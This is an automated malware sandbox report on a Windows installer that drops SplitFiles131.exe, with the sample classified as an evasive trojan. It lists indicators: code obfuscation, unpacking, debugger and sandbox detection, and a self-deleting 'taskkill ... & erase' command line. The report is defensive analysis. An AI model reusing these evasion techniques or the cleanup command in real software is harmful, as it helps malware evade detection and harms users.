Source: is-5V8K4.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-5V8K4.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-5V8K4.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.295778835.0000000000417000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.296513260.00000000023A9000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.296720525.000000000218D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe Binary or memory string: OriginalFilename" vs file.exe
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Split Files\is-5V8K4.tmp 1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
Source: SplitFiles131.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe" Jump to behavior
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe Jump to behavior
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70, 0_2_0040910C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70, 1_2_00453D80
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SplitFiles131.exe")
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963} Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@12/39@0/5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004547A0 GetModuleHandleA,6D715550,GetDiskFreeSpaceA, 1_2_004547A0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification, 2_2_00405350
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040B090 FindResourceA,FreeResource, 1_2_0040B090
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files Jump to behavior
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: `a}{ 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: MFE. 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1970815 > 1048576

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
Detected unpacking (changes PE section rights)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406594 push 004065D1h; ret 0_2_004065C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404159 push eax; ret 0_2_00404195
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404229 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004042AA push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404327 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408BDC push 00408C0Fh; ret 0_2_00408C07
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040438C push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax 0_2_00407F41
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00409A20 push 00409A5Dh; ret 1_2_00409A55
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040A107 push ds; ret 1_2_0040A108
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax 1_2_004302D5
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax 1_2_004063C1
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004785C8 push 00478673h; ret 1_2_0047866B
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00410798 push ecx; mov dword ptr [esp], edx 1_2_0041079D
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004129F0 push 00412A53h; ret 1_2_00412A4B
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax 1_2_0045AAA1
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00450EB4 push 00450EE7h; ret 1_2_00450EDF
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx 1_2_0040D0F2
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx 1_2_00443534
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004055BD push eax; ret 1_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx 1_2_0040F652
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040568D push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040570E push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004057F0 push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040578B push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx 1_2_00479B25
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx 1_2_00419CF5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004311AD push esi; ret 2_2_004311B6
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F4BB push ecx; ret 2_2_0040F4CE
PE file contains sections with non-standard names
Source: SplitFiles131.exe.1.dr Static PE information: section name: .ave131
Source: initial sample Static PE information: section name: .text entropy: 7.241012836973415
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files\SplitFiles131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files\is-5V8K4.tmp Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00478118
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0042425C IsIconic,SetActiveWindow, 1_2_0042425C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus, 1_2_004242A4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0041844C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_00422924
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00417660 IsIconic,GetCapture, 1_2_00417660
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00417D96 IsIconic,SetWindowPos, 1_2_00417D96
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417D98
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-5V8K4.tmp Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Contains functionality to detect sandboxes (foreground window change detection)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409764
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045157C FindFirstFileA,GetLastError, 1_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0048AC5C FindFirstFileA,6D7169D0,FindNextFileA,FindClose, 1_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEB0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Jump to behavior
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWN
Source: SplitFiles131.exe, 00000002.00000002.376419998.0000000001613000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.376486762.000000000164B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc, 2_2_00402F20
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] 2_2_0042041F
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] 2_2_004429E7
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] 2_2_00417BAF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] 2_2_100091C7
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] 2_2_10006CE1
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F789 SetUnhandledExceptionFilter, 2_2_0040F789
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F5F5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040EBD2
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10006180
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_100035DF
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10003AD4
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00459734 GetVersion,GetModuleHandleA,6D715550,6D715550,6D715550,AllocateAndInitializeSid,LocalFree, 1_2_00459734
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_004051D8
